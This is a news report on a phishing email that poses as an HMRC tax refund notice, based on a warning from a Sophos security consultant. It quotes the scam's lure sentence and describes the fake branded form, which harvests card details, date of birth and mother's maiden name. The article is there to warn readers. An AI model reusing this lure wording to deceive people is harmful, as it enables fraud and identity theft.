The media firestorm surrounding the PAYE under- and overpayment letters that went out to 45,000 taxpayers this week has provided an ideal opportunity for scammers, according to Sophos security experts.
In his blog, Sophos security consultant Graham Cluley published an example spam message now circulating, which arrives with the subject line, “You Have An HMRC Refund”.
The email explains: “Following an upgrade of our computer systems and review of our records we have investigated your payments and latest tax returns over the past years, our calculations show you have made over payments of 317.66GBP.”
A file called Refund-Form.zip is attached to the mail containing an HTML form with HMRC branding asking for credit card details, date of birth, and mother's maiden name.
“If you do make the mistake of filling in the form,” Cluley warned, “your confidential data is uploaded to a Chinese server. You're not going to receive a windfall because of this form - you've just been phished.”
HMRC will not be contacting people about rebates or tax owed either by email or telephone. Nor will it ask for bank details. HMRC's security page contains advice about scams like this, and clearly states that they would never inform customers of a tax rebate via email, or invite them to complete an online form to receive a rebate of tax.